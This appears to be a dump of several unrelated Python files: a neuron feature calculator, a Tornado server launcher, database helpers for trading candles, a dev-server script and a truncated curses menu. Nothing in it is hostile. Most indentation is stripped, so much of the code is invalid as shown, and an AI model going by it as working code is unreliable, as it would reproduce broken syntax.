self.assertEqual(test_caches.all(initialized_only=True), [cache_1])
self.assertEqual(len(test_caches.all()), 2)
# .all() initializes all caches.
self.assertEqual(len(test_caches.all(initialized_only=True)), 2)
self.assertEqual(test_caches.all(), test_caches.all(initialized_only=True))
calc_features_mp.py
import sys
import os
import multiprocessing as mp
import traceback
import networkx as nx
import numpy as np
import constants
import util
import util_batch
import util_amira
import util_geometry
import util_graph
import util_meta
import util_time
import util_feature_IO
import util_morphology
import util_morphology_slice
def getEmptyValues(synapticSide):
if(synapticSide == "pre"):
return {
"length" : 0,
"distSoma" : [],
"boutons" : 0
}
else:
return {
"length" : 0,
"distSoma" : [],
"pstExc" : 0,
"pstExcApical" : 0,
"pstExcBasal" : 0,
"pstExcSoma" : 0,
"pstInh" : 0,
"pstInhApical" : 0,
"pstInhBasal" : 0,
"pstInhSoma" : 0,
}
def getBoutonDensity(boutonDensities, cellType, gridCells, grid, cube):
if(cube not in gridCells):
return 0
else:
return boutonDensities[cellType][grid[cube]["laminar_location"]]
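# The density returned above is a bouton count per unit axon length for the given
# cell type and the laminar location of the cube; processBatch() later multiplies
# it by the traversed axon length inside the cube to estimate bouton counts.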
def getPostsynapticTargets(densities, cellTypeId, edgeLabel, length, area):
pstDensities = densities[cellTypeId]
if(edgeLabel == "Soma"):
pstExc = pstDensities["exc"]["density_soma_length"] * length + pstDensities["exc"]["density_soma_area"] * area
pstInh = pstDensities["inh"]["density_soma_length"] * length + pstDensities["inh"]["density_soma_area"] * area
elif(edgeLabel == "ApicalDendrite"):
pstExc = pstDensities["exc"]["density_apical_length"] * length + pstDensities["exc"]["density_apical_area"] * area
pstInh = pstDensities["inh"]["density_apical_length"] * length + pstDensities["inh"]["density_apical_area"] * area
elif(edgeLabel == "BasalDendrite"):
pstExc = pstDensities["exc"]["density_basal_length"] * length + pstDensities["exc"]["density_basal_area"] * area
pstInh = pstDensities["inh"]["density_basal_length"] * length + pstDensities["inh"]["density_basal_area"] * area
else:
raise RuntimeError("invalid label {}".format(edgeLabel))
return pstExc, pstInh
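# Hedged worked example for getPostsynapticTargets (the density values and units
# below are assumed, not taken from the data): with density_apical_length = 1.0,
# length = 2.0, density_apical_area = 0.5 and area = 4.0, an "ApicalDendrite" edge
# contributes pstExc = 1.0 * 2.0 + 0.5 * 4.0 = 4.0 expected postsynaptic targets.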
def updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, event):
"""
    traversal_state = {
        "nodeStart"    : node at which the traversal of the current edge starts,
        "nodeEnd"      : node at which the traversal of the current edge ends,
        "nextCube"     : grid cube that the next point pair falls into,
        "activeCube"   : grid cube currently being accumulated into,
        "activeBranch" : branch id within the active cube,
    }
"""
traversal_state["activeCube"] = traversal_state["nextCube"]
cube = traversal_state["activeCube"]
# first step on edge
if(event == "firstStep"):
nodeStart = traversal_state["nodeStart"]
if((nodeStart, cube) in node_cube_branch):
existingBranchId = node_cube_branch[(nodeStart, cube)]
traversal_state["activeBranch"] = existingBranchId
return cube_branch_values[cube][existingBranchId]
else:
            # initialize per-cube storage on first visit
if(cube not in cube_branch_values):
cube_branch_values[cube] = {}
# create new branch
newBranchId = len(cube_branch_values[cube])
cube_branch_values[cube][newBranchId] = getEmptyValues(synapticSide)
node_cube_branch[(nodeStart, cube)] = newBranchId
traversal_state["activeBranch"] = newBranchId
return cube_branch_values[cube][newBranchId]
# go from one cube into next
if(event == "crossBorder"):
        # initialize per-cube storage on first visit
if(cube not in cube_branch_values):
cube_branch_values[cube] = {}
# create new branch
newBranchId = len(cube_branch_values[cube])
cube_branch_values[cube][newBranchId] = getEmptyValues(synapticSide)
traversal_state["activeBranch"] = newBranchId
return cube_branch_values[cube][newBranchId]
# set branch in target node
if(event == "lastStep"):
nodeEnd = traversal_state["nodeEnd"]
node_cube_branch[(nodeEnd, cube)] = traversal_state["activeBranch"]
return None
def filterFeatures(boundsFilter, cube_branch_values):
filtered = {}
gridCells = boundsFilter["gridCells"]
if(gridCells):
for cube, branch_values in cube_branch_values.items():
if(cube in gridCells):
filtered[cube] = branch_values
else:
ixiyiz_min = boundsFilter["ixiyiz_min"]
ixiyiz_max = boundsFilter["ixiyiz_max"]
for cube, branch_values in cube_branch_values.items():
if(util_geometry.indicesInBounds(cube, ixiyiz_min, ixiyiz_max)):
filtered[cube] = branch_values
#print("filter", len(cube_branch_values), len(filtered))
return filtered
def getBoundsFilter(networkDir, boundsDescriptor, gridDescriptor, outProps):
if(boundsDescriptor is None):
return None
boundsFilter = {}
if(outProps):
boundsFilter["gridCells"] = None
boundsFilter["boxMin"] = outProps["gridBounds"]["boxMin"]
boundsFilter["boxMax"] = outProps["gridBounds"]["boxMax"]
boundsFilter["ixiyiz_min"] = outProps["gridBounds"]["ixiyiz_min"]
boundsFilter["ixiyiz_max"] = outProps["gridBounds"]["ixiyiz_max"]
else:
gridBounds = util_meta.loadGrid_ixiyiz(os.path.join(networkDir, "grid_{}_{}.csv".format(gridDescriptor, boundsDescriptor)))
boundsFilter["gridCells"] = set(gridBounds.keys())
if(boundsDescriptor == "ref-volume"):
boundsFilter["boxMin"], boundsFilter["boxMax"] = constants.getReferenceVolume()
elif(boundsDescriptor == "C2-volume"):
boundsFilter["boxMin"], boundsFilter["boxMax"] = constants.getC2Volume()
else:
raise RuntimeError("Invalid bounds descriptor: {}".format(boundsDescriptor))
return boundsFilter
def getBranchCount(cube_branch_values):
count = 0
for branches in cube_branch_values.values():
count += len(branches)
return count
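# registerFeatures() turns the per-cube / per-branch accumulators into the output
# structure selected by outProps["type"]: "pstAll" sums raw pst counts into shared
# arrays, "pst" / "pstBranch" normalize a neuron's pst by those all-neuron totals
# (i.e. its fraction of the cube's total postsynaptic targets), and
# "pre" / "preBranch" collect bouton counts.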
def registerFeatures(neuronId, cube_branch_values, outProps):
if(outProps["type"] == "pstAll"):
pstAllExcArray = outProps["pstAllExc"]
pstAllInhArray = outProps["pstAllInh"]
lock = outProps["lock"]
gridBounds = outProps["gridBounds"]
D = {} # cubeArrayIdx -> (pstExc, pstInh)
for cube, branches in cube_branch_values.items():
pstExc = 0
pstInh = 0
for values in branches.values():
pstExc += values["pstExc"]
pstInh += values["pstInh"]
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
D[arrayIdx] = (pstExc, pstInh)
lock.acquire()
for idx, values in D.items():
pstAllExcArray[idx] += values[0]
pstAllInhArray[idx] += values[1]
lock.release()
elif(outProps["type"] == "pst"):
pstAllExcArray = outProps["pstAllExc"]
pstAllInhArray = outProps["pstAllInh"]
gridBounds = outProps["gridBounds"]
nCubes = len(cube_branch_values.keys())
arrayIndices = np.zeros(nCubes, dtype=int)
arrayPstExcNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstExcApicalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstExcBasalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstExcSomaNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhApicalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhBasalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhSomaNorm = np.zeros(nCubes, dtype=np.float32)
i = 0
for cube, branches in cube_branch_values.items():
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
arrayIndices[i] = arrayIdx
pstExc = 0
pstExcApical = 0
pstExcBasal = 0
pstExcSoma = 0
pstInh = 0
pstInhApical = 0
pstInhBasal = 0
pstInhSoma = 0
for values in branches.values():
pstExc += values["pstExc"]
pstExcApical += values["pstExcApical"]
pstExcBasal += values["pstExcBasal"]
pstExcSoma += values["pstExcSoma"]
pstInh += values["pstInh"]
pstInhApical += values["pstInhApical"]
pstInhBasal += values["pstInhBasal"]
pstInhSoma += values["pstInhSoma"]
if(pstExc > 0):
arrayPstExcNorm[i] = pstExc / pstAllExcArray[arrayIdx]
arrayPstExcApicalNorm[i] = pstExcApical / pstAllExcArray[arrayIdx]
arrayPstExcBasalNorm[i] = pstExcBasal / pstAllExcArray[arrayIdx]
arrayPstExcSomaNorm[i] = pstExcSoma / pstAllExcArray[arrayIdx]
if(pstInh > 0):
arrayPstInhNorm[i] = pstInh / pstAllInhArray[arrayIdx]
arrayPstInhApicalNorm[i] = pstInhApical / pstAllInhArray[arrayIdx]
arrayPstInhBasalNorm[i] = pstInhBasal / pstAllInhArray[arrayIdx]
arrayPstInhSomaNorm[i] = pstInhSoma / pstAllInhArray[arrayIdx]
i += 1
sortIdx = np.argsort(arrayIndices)
arrayIndices = arrayIndices[sortIdx]
arrayPstExcNorm = arrayPstExcNorm[sortIdx]
arrayPstExcApicalNorm = arrayPstExcApicalNorm[sortIdx]
arrayPstExcBasalNorm = arrayPstExcBasalNorm[sortIdx]
arrayPstExcSomaNorm = arrayPstExcSomaNorm[sortIdx]
arrayPstInhNorm = arrayPstInhNorm[sortIdx]
arrayPstInhApicalNorm = arrayPstInhApicalNorm[sortIdx]
arrayPstInhBasalNorm = arrayPstInhBasalNorm[sortIdx]
arrayPstInhSomaNorm = arrayPstInhSomaNorm[sortIdx]
outProps["featuresPost"][neuronId] = {
"arrayIndices" : arrayIndices,
"arrayPstExcNorm" : arrayPstExcNorm,
"arrayPstExcApicalNorm" : arrayPstExcApicalNorm,
"arrayPstExcBasalNorm" : arrayPstExcBasalNorm,
"arrayPstExcSomaNorm" : arrayPstExcSomaNorm,
"arrayPstInhNorm" : arrayPstInhNorm,
"arrayPstInhApicalNorm" : arrayPstInhApicalNorm,
"arrayPstInhBasalNorm" : arrayPstInhBasalNorm,
"arrayPstInhSomaNorm" : arrayPstInhSomaNorm,
}
elif(outProps["type"] == "pstBranch"):
pstAllExcArray = outProps["pstAllExc"]
pstAllInhArray = outProps["pstAllInh"]
gridBounds = outProps["gridBounds"]
for cube, branchValues in cube_branch_values.items():
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
pstAllExcVal = pstAllExcArray[arrayIdx]
pstAllInhVal = pstAllInhArray[arrayIdx]
for values in branchValues.values():
pstExc = values["pstExc"]
if(pstExc):
values["pstExc"] = pstExc / pstAllExcVal
pstInh = values["pstInh"]
if(pstInh):
values["pstInh"] = pstInh / pstAllInhVal
outProps["featuresPost"][neuronId] = cube_branch_values
elif(outProps["type"] == "pre"):
if(outProps["featuresPre"] is None):
raise NotImplementedError("refactored to dict: nid -> ...")
gridBounds = outProps["gridBounds"]
nCubes = len(cube_branch_values.keys())
arrayIndices = np.zeros(nCubes, dtype=int)
arrayBoutons = np.zeros(nCubes, dtype=np.float32)
i = 0
for cube, branches in cube_branch_values.items():
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
arrayIndices[i] = arrayIdx
boutons = 0
for values in branches.values():
boutons += values["boutons"]
arrayBoutons[i] = boutons
i += 1
sortIdx = np.argsort(arrayIndices)
arrayIndices = arrayIndices[sortIdx]
arrayBoutons = arrayBoutons[sortIdx]
outProps["featuresPre"][neuronId] = {
"arrayIndices" : arrayIndices,
"arrayBoutons" : arrayBoutons,
}
elif(outProps["type"] == "preBranch"):
outProps["featuresPre"] = cube_branch_values
elif(outProps["type"] == "postMorphology"):
return
else:
raise RuntimeError("invalid output type {}".format(outProps["type"]))
def isInsideBounds(cube, gridBounds):
ixiyiz_min = gridBounds["ixiyiz_min"]
ixiyiz_max = gridBounds["ixiyiz_max"]
return util_geometry.indicesInBounds(cube, ixiyiz_min, ixiyiz_max)
def getGraphset(networkDir, outProps):
if(outProps and "featureComputationData" in outProps):
return outProps["featureComputationData"]["graphset"]
elif(outProps and ((outProps["type"] == "pre") or (outProps["type"] == "preBranch") or (outProps["type"] == "postMorphology"))):
return outProps["graphset"]
else:
return util_morphology.loadGraphset(networkDir)
def getPreFeatureComputationData(networkDir, outProps):
if(outProps and "featureComputationData" in outProps):
boutonDensities = outProps["featureComputationData"]["boutonDensities"]
grid = outProps["featureComputationData"]["grid"]
gridCells = outProps["featureComputationData"]["gridCells"]
elif(outProps and (outProps["type"] == "pre" or outProps["type"] == "preBranch")):
boutonDensities = outProps["boutonDensities"]
grid = outProps["grid"]
gridCells = outProps["gridCells"]
else:
boutonDensities = util_meta.loadBoutonDensityMap(networkDir)
grid = util_meta.loadGrid_ixiyiz(os.path.join(networkDir, "grid_50-50-50_all.csv"))
gridCells = set(grid.keys())
return boutonDensities, grid, gridCells
def getPostFeatureComputationData(networkDir, outProps):
if(outProps and "featureComputationData" in outProps):
pstDensities = outProps["featureComputationData"]["pstDensities"]
elif(outProps and outProps["type"] == "postMorphology"):
pstDensities = outProps["pstDensities"]
else:
pstDensities = util_meta.loadPstDensityMap(networkDir)
return pstDensities
def getNeurons(batchfile, networkDir, outProps):
if(batchfile is not None):
batchDescriptor = os.path.basename(batchfile)
neuronIds = np.loadtxt(batchfile, dtype=int).reshape((-1)).tolist()
if(outProps and "featureComputationData" in outProps):
neuronsOriginal = outProps["featureComputationData"]["neuronsOriginal"]
else:
neuronsOriginal = util_meta.loadNeuronProps(os.path.join(networkDir, "meta", "neurons.csv"))
elif(outProps and (outProps["type"] == "pre" or outProps["type"] == "preBranch")):
batchDescriptor = "single-pre"
neuronIds = [outProps["neuronId"]]
neuronsOriginal = outProps["neuronsOriginal"]
elif(outProps and outProps["type"] == "postMorphology"):
batchDescriptor = "single-post"
neuronIds = [outProps["neuronId"]]
neuronsOriginal = outProps["neuronsOriginal"]
else:
raise RuntimeError
return batchDescriptor, neuronIds, neuronsOriginal
def getSliceParams(outProps):
if(outProps is None):
return None
elif("sliceParams" in outProps):
return outProps["sliceParams"]
else:
return None
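# processBatch() is the per-worker entry point: for every neuron in the batch it
# loads the transformed morphology, walks the axon (pre) or dendrite (post) tree
# edge by edge, splits each edge at grid-cube boundaries, and accumulates length,
# soma distance and bouton / pst values per cube and branch before writing them
# to disk or registering them via registerFeatures().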
def processBatch(batchfile, synapticSide, gridDescriptor, boundsDescriptor, networkDir, outputFolder, outProps=None, logFolder=None):
batchDescriptor, neuronIds, neuronsOriginal = getNeurons(batchfile, networkDir, outProps)
if(synapticSide == "pre"):
boutonDensities, grid, gridCells = getPreFeatureComputationData(networkDir, outProps)
else:
pstDensities = getPostFeatureComputationData(networkDir, outProps)
graphset = getGraphset(networkDir, outProps)
boundsFilter = getBoundsFilter(networkDir, boundsDescriptor, gridDescriptor, outProps)
registerEdgePoints = outProps is not None and outProps["type"] == "postMorphology"
sliceParams = getSliceParams(outProps)
util_geometry.setGridSize(gridDescriptor)
#print("batch {}: active grid size".format(batchDescriptor), util_geometry.GRIDSIZE)
for k in range(0, len(neuronIds)):
neuronId = neuronIds[k]
if(outputFolder):
outfile = os.path.join(outputFolder,"{}.csv".format(neuronId))
cellTypeOriginalId = neuronsOriginal[neuronId]["cell_type"]
try:
if(synapticSide == "pre"):
idx = len(graphset[neuronId]) - 1
filename = graphset[neuronId][idx]["file"]
T = graphset[neuronId][idx]["transformation"]
else:
filename = graphset[neuronId][0]["file"]
T = graphset[neuronId][0]["transformation"]
neuron = util_amira.readSpatialGraph(filename, T)
nOriginal = len(neuron)
if(sliceParams is not None):
neuron = util_morphology_slice.sliceNeuron(neuron, sliceParams)
if(synapticSide == "pre"):
components = util_graph.getSeparatedComponentsPre(neuron)
rootNode = components["axon"]["root"]
tree = components["axon"]["tree"]
else:
components = util_graph.getSeparatedComponentsPost(neuron)
rootNode = components["dendrite"]["root"]
tree = components["dendrite"]["tree"]
rootDists = {}
rootDists[rootNode] = 0
edges = list(nx.edge_dfs(tree, source=rootNode, orientation='ignore'))
node_cube_branch = {}
cube_branch_values = {}
edgeCounter = 0
edgeCounterMorphology = -1
for u, v, d in edges:
edgeCounter += 1
edgeCounterMorphology += 1
edge = neuron.edges[u, v]
nodeStart = u
nodeEnd = v
points = edge["points"]
if(d == "reverse"):
nodeStart = v
nodeEnd = u
points.reverse()
if(boundsFilter is not None and not util_geometry.pointsInBounds(points, boundsFilter["boxMin"], boundsFilter["boxMax"])):
continue
label = edge["label"]
if(synapticSide == "pre" and label == "Soma"):
raise RuntimeError("Traversed soma: u {}, v {}".format(u, v))
if(sliceParams is not None and label not in sliceParams["compartment"]):
continue
traversal_state = {
"nodeStart" : nodeStart,
"nodeEnd" : nodeEnd,
"nextCube" : None,
"activeCube" : None,
"activeBranch" : None,
}
dataHandle = None
if(boundsFilter is None):
rd = rootDists[nodeStart]
else:
rd = -1
pointsIntersected, indices = util_geometry.getIntersectedEdgePoints(points)
for i in range(1, len(pointsIntersected)):
p1 = pointsIntersected[i-1]
i1 = indices[i-1]
p2 = pointsIntersected[i]
i2 = indices[i]
traversal_state["nextCube"] = util_geometry.getCommonIndices(i1, i2)
if(i == 1):
dataHandle = updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, "firstStep")
elif(traversal_state["nextCube"] != traversal_state["activeCube"]):
if(registerEdgePoints):
nextCubeInside = isInsideBounds(traversal_state["nextCube"], outProps["gridBounds"])
activeCubeInside = isInsideBounds(traversal_state["activeCube"], outProps["gridBounds"])
if(nextCubeInside != activeCubeInside):
edgeCounterMorphology += 1
dataHandle = updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, "crossBorder")
l = np.linalg.norm(p1[0:3]-p2[0:3])
if(label != "Soma"):
if(boundsFilter is None):
rd += l
dataHandle["length"] += l
dataHandle["distSoma"].append(rd)
if(synapticSide == "pre"):
cubeForDensity = traversal_state["activeCube"]
if(gridDescriptor != "50-50-50"):
cubeForDensity = util_geometry.getClosest50MicronCube(cubeForDensity)
boutonDensity = getBoutonDensity(boutonDensities, cellTypeOriginalId, gridCells, grid, cubeForDensity)
dataHandle["boutons"] += boutonDensity * l
else:
area = util_geometry.getTruncatedConeArea(l, p1[3], p2[3])
pstExc, pstInh = getPostsynapticTargets(pstDensities, cellTypeOriginalId, label, l, area)
dataHandle["pstExc"] += pstExc
dataHandle["pstInh"] += pstInh
if(label == "BasalDendrite"):
dataHandle["pstExcBasal"] += pstExc
dataHandle["pstInhBasal"] += pstInh
if(label == "ApicalDendrite"):
dataHandle["pstExcApical"] += pstExc
dataHandle["pstInhApical"] += pstInh
if(label == "Soma"):
dataHandle["pstExcSoma"] += pstExc
dataHandle["pstInhSoma"] += pstInh
if(registerEdgePoints):
if(isInsideBounds(traversal_state["activeCube"], outProps["gridBounds"])):
if(edgeCounterMorphology not in outProps["edges"].keys()):
outProps["edges"][edgeCounterMorphology] = []
outProps["edgeLabels"][edgeCounterMorphology] = label
outProps["edges"][edgeCounterMorphology].append(p1)
outProps["edges"][edgeCounterMorphology].append(p2)
updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, "lastStep")
rootDists[nodeEnd] = rd
if(boundsFilter is not None):
cube_branch_values = filterFeatures(boundsFilter, cube_branch_values)
if(cube_branch_values):
if(outputFolder):
if(synapticSide == "pre"):
util_feature_IO.writeAxonFeatures(outfile, cube_branch_values)
else:
util_feature_IO.writeDendriteFeatures(outfile, cube_branch_values)
else:
registerFeatures(neuronId, cube_branch_values, outProps)
print("batch {}: processed {} ({}/{})".format(batchDescriptor, neuronId, k+1, len(neuronIds)))
except Exception as e:
if(logFolder is not None):
with open(os.path.join(logFolder,"{}_error.txt".format(neuronId)), "w+") as f:
f.write("{}\n\n".format(neuronId))
f.write("{}\n\n".format(e))
f.write(traceback.format_exc())
print(traceback.format_exc())
print("batch {}: failed {} ({}/{})".format(batchDescriptor, neuronId, k+1, len(neuronIds)))
def printUsageAndExit(message):
if(message):
print("{}\n\n".format(message))
print("Usage:")
print("calc_features_mp.py network-dir synaptic_side grid-descriptor bounds num-workers [exclude-existing] [NID]")
print("")
print("network-dir: network directory")
print("synaptic_side: pre, post")
print("grid-descriptor: 50-50-50, 100-100-50")
print("bounds: all, ref-volume, C2-volume")
print("num-workers: 5, 6, ...")
print("exclude-exsiting: keep exisiting files in output directory (default: false)")
sys.exit(1)
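# Example invocation (hypothetical network path and worker count, shown only to
# illustrate the argument order documented above):
#   python calc_features_mp.py /path/to/network-dir pre 50-50-50 all 8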
if __name__ == '__main__':
if(len(sys.argv) not in [6,7,8]):
printUsageAndExit("Wrong number of arguments.")
networkDir = sys.argv[1]
synapticSide = sys.argv[2]
if(synapticSide not in ["pre", "post"]):
printUsageAndExit("Invalid synaptic side.")
gridDescriptor = sys.argv[3]
util_geometry.setGridSize(gridDescriptor)
boundsDescriptor = sys.argv[4]
if(boundsDescriptor not in ["all", "ref-volume", "C2-volume"]):
printUsageAndExit("Invalid bounds.")
outfolder = os.path.join(networkDir, "subcellular_features_{}synaptic_{}_{}".format(synapticSide, gridDescriptor, boundsDescriptor))
if(boundsDescriptor == "all"):
boundsDescriptor = None
numWorkers = int(sys.argv[5])
keepExisting = len(sys.argv) in [7,8]
if(len(sys.argv) == 8):
nid = int(sys.argv[7])
numWorkers = 1
else:
nid = None
if(not keepExisting):
print("clearing folder {}".format(outfolder))
util.makeCleanDir(outfolder)
batchname = "{}_{}".format(synapticSide, gridDescriptor)
batchfiles = util_batch.getBatchFiles(networkDir, synapticSide, gridDescriptor, boundsDescriptor, batchname, numWorkers, excludeExisting=keepExisting, nids=[nid])
for batchfile in batchfiles:
p = mp.Process(target=processBatch, args=(batchfile, synapticSide, gridDescriptor, boundsDescriptor, networkDir, outfolder,))
p.start()
|
__init__.py
|
import socket
from threading import Thread
import time
import sys
import os
from configparser import ConfigParser
from tornado.web import Application
from tornado.ioloop import IOLoop
import schedule
from .common.controllers import Error404Handler
from server.routes import get_handlers
from .database import connection
def get_settings(config):
return {
"static_path": os.path.join(os.getcwd(), 'server', 'common', 'resources'),
"static_url_prefix": "/resources/",
"template_path": os.path.join(os.getcwd(), 'server'),
"cookie_secret": config["Server"]["cookie_secret"],
"login_url": "/login",
"debug": True
}
def main():
# Thread(target=stop_tornado).start()
Thread(target=launch_schedule).start()
create_app()
# def stop_tornado():
# while not 'q' == input('Enter q to quit: \n'):
# pass
# IOLoop.instance().stop()
def create_app():
config = ConfigParser()
config.read('settings.ini')
connection.db_url = config['Database']['url']
settings = get_settings(config)
app = Application(get_handlers(), **settings, default_handler_class=Error404Handler)
# app.listen(int(config['Server']['port']), config['Server']['address'])
# print('running server on http://'+config['Server']['address']+':'+config['Server']['port'])
# print(socket.gethostbyname_ex(socket.gethostname()))
# print(socket.gethostbyname_ex(socket.gethos))
app.listen(int(config['Server']['port']), socket.gethostbyname(socket.gethostname()))
# app.listen(int(config['Server']['port']), "192.168.1.45")
print('running server on http://' + socket.gethostbyname(socket.gethostname()) + ':' + config['Server']['port'])
IOLoop.instance().start()
def launch_schedule():
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
sys.exit(int(main() or 0))
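# A minimal settings.ini sketch matching the keys read in create_app above.
# The values are placeholders for illustration, not the project's real configuration:
#
#   [Server]
#   port = 8888
#   cookie_secret = change-me
#
#   [Database]
#   url = sqlite:///app.db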
|
utils.py
|
from jesse.models.Candle import Candle
from jesse.models.Ticker import Ticker
from jesse.models.Trade import Trade
from jesse.models.Orderbook import Orderbook
import jesse.helpers as jh
import threading
import numpy as np
def store_candle_into_db(exchange: str, symbol: str, candle: np.ndarray):
"""
store candle into the database
"""
d = {
'id': jh.generate_unique_id(),
'symbol': symbol,
'exchange': exchange,
'timestamp': candle[0],
'open': candle[1],
'high': candle[3],
'low': candle[4],
'close': candle[2],
'volume': candle[5]
}
def async_save():
Candle.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
'candle: {}-{}-{}: {}'.format(jh.timestamp_to_time(d['timestamp']), exchange, symbol, candle),
'blue'
)
)
# async call
threading.Thread(target=async_save).start()
def store_ticker_into_db(exchange: str, symbol: str, ticker: np.ndarray):
d = {
'id': jh.generate_unique_id(),
'timestamp': ticker[0],
'last_price': ticker[1],
'high_price': ticker[2],
'low_price': ticker[3],
'volume': ticker[4],
'symbol': symbol,
'exchange': exchange,
}
def async_save():
Ticker.insert(**d).on_conflict_ignore().execute()
print(
jh.color('ticker: {}-{}-{}: {}'.format(
jh.timestamp_to_time(d['timestamp']), exchange, symbol, ticker
), 'yellow')
)
# async call
threading.Thread(target=async_save).start()
def store_trade_into_db(exchange: str, symbol: str, trade: np.ndarray):
d = {
'id': jh.generate_unique_id(),
'timestamp': trade[0],
'price': trade[1],
'buy_qty': trade[2],
'sell_qty': trade[3],
'buy_count': trade[4],
'sell_count': trade[5],
'symbol': symbol,
'exchange': exchange,
}
def async_save():
Trade.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
'trade: {}-{}-{}: {}'.format(
jh.timestamp_to_time(d['timestamp']), exchange, symbol, trade
),
'green'
)
)
# async call
threading.Thread(target=async_save).start()
def store_orderbook_into_db(exchange: str, symbol: str, orderbook: np.ndarray):
d = {
'id': jh.generate_unique_id(),
'timestamp': jh.now(),
'data': orderbook.dumps(),
'symbol': symbol,
'exchange': exchange,
}
def async_save():
Orderbook.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
'orderbook: {}-{}-{}: [{}, {}], [{}, {}]'.format(
jh.timestamp_to_time(d['timestamp']), exchange, symbol,
# best ask
orderbook[0][0][0], orderbook[0][0][1],
# best bid
orderbook[1][0][0], orderbook[1][0][1]
),
'magenta'
)
)
# async call
threading.Thread(target=async_save).start()
def fetch_candles_from_db(exchange: str, symbol: str, start_date: int, finish_date: int) -> tuple:
candles_tuple = tuple(
Candle.select(
Candle.timestamp, Candle.open, Candle.close, Candle.high, Candle.low,
Candle.volume
).where(
Candle.timestamp.between(start_date, finish_date),
Candle.exchange == exchange,
Candle.symbol == symbol
).order_by(Candle.timestamp.asc()).tuples()
)
return candles_tuple
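# Minimal usage sketch (assumptions for illustration only: the candle array layout
# is inferred from the field mapping in store_candle_into_db above, i.e.
# [timestamp, open, close, high, low, volume]; a configured database connection is
# assumed; the exchange and symbol names are placeholders):
if __name__ == '__main__':
    sample_candle = np.array([
        1609459200000,  # timestamp in milliseconds
        29000.0,        # open
        29150.0,        # close
        29200.0,        # high
        28950.0,        # low
        123.45,         # volume
    ])
    # inserts asynchronously via the worker thread started inside the helper
    store_candle_into_db('Binance', 'BTC-USDT', sample_candle)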
|
dev_servers.py
|
"""\
Examples
For the development.ini you must supply the paster app name:
%(prog)s development.ini --app-name app --init --clear
"""
from pkg_resources import resource_filename
from pyramid.paster import get_app
from multiprocessing import Process
import atexit
import logging
import os.path
import select
import shutil
import sys
import pdb
try:
import subprocess32 as subprocess
except ImportError:
import subprocess
EPILOG = __doc__
logger = logging.getLogger(__name__)
def nginx_server_process(prefix='', echo=False):
args = [
os.path.join(prefix, 'nginx'),
'-c', resource_filename('snovault', 'nginx-dev.conf'),
'-g', 'daemon off;'
]
process = subprocess.Popen(
args,
close_fds=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
if not echo:
process.stdout.close()
if echo:
print('Started: http://localhost:8000')
return process
def main():
import argparse
parser = argparse.ArgumentParser(
description="Run development servers", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument('config_uri', help="path to configfile")
parser.add_argument('--clear', action="store_true", help="Clear existing data")
parser.add_argument('--init', action="store_true", help="Init database")
parser.add_argument('--load', action="store_true", help="Load test set")
parser.add_argument('--datadir', default='/tmp/snovault', help="path to datadir")
args = parser.parse_args()
logging.basicConfig()
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('snovault').setLevel(logging.INFO)
from snovault.tests import elasticsearch_fixture, postgresql_fixture
from snovault.elasticsearch import create_mapping
datadir = os.path.abspath(args.datadir)
pgdata = os.path.join(datadir, 'pgdata')
esdata = os.path.join(datadir, 'esdata')
if args.clear:
for dirname in [pgdata, esdata]:
if os.path.exists(dirname):
shutil.rmtree(dirname)
if args.init:
postgresql_fixture.initdb(pgdata, echo=True)
postgres = postgresql_fixture.server_process(pgdata, echo=True)
elasticsearch = elasticsearch_fixture.server_process(esdata, echo=True)
nginx = nginx_server_process(echo=True)
processes = [postgres, elasticsearch, nginx]
print_processes = []
@atexit.register
def cleanup_process():
for process in processes:
if process.poll() is None:
process.terminate()
for process in processes:
try:
for line in process.stdout:
sys.stdout.write(line.decode('utf-8'))
except IOError:
pass
process.wait()
for p in print_processes:
p.terminate()
if args.init:
app = get_app(args.config_uri, args.app_name)
create_mapping.run(app)
if args.load:
from pyramid.path import DottedNameResolver
load_test_data = app.registry.settings.get('snovault.load_test_data')
load_test_data = DottedNameResolver().resolve(load_test_data)
load_test_data(app)
print('Started. ^C to exit.')
stdouts = [p.stdout for p in processes]
def print_to_terminal(stdout):
while True:
for line in iter(stdout.readline, b''):
sys.stdout.write(line.decode('utf-8'))
readable, writable, err = select.select(stdouts, [], stdouts, 5)
for stdout in readable:
print_processes.append(Process(target=print_to_terminal, args=(stdout,)))
for stdout in err:
print_processes.append(Process(target=print_to_terminal, args=(stdout,)))
for p in print_processes:
p.start()
if __name__ == '__main__':
main()
|
main.py
|
#!/usr/bin/env python3
from sensor import sensor
from room_devices import room_devices
from mqtt import mqtt
# from instance import room_devices
from threading import Thread
import curses
import time
def salutation(screen):
screen.addstr(0, 0, "digite 0 para sair do programa")
screen.addstr(1, 0, "digite 1 para adicionar um novo dispositivo")
screen.addstr(2, 0, "digite 2 para setar o estado de um dispositivo")
screen.addstr(3, 0, "digite 3 para parar o alarme")
def input_str(screen, y_pos : int, length : int, instructions = "") -> str:
screen.clear()
screen.nodelay(False)
curses.echo()
screen.addstr(y_pos - 1, 0, instructions)
screen.refresh()
    string = screen.getstr(y_pos, 0, length)
curses.noecho()
screen.nodelay(True)
return string.decode("utf-8")
# mqtt = Mqtt()
if __name__ == "__main__":
try:
polling = room_devices.run_polling()
screen = curses.initscr()
curses.noecho()
screen.nodelay(True)
flag = -1
y_pos = 4
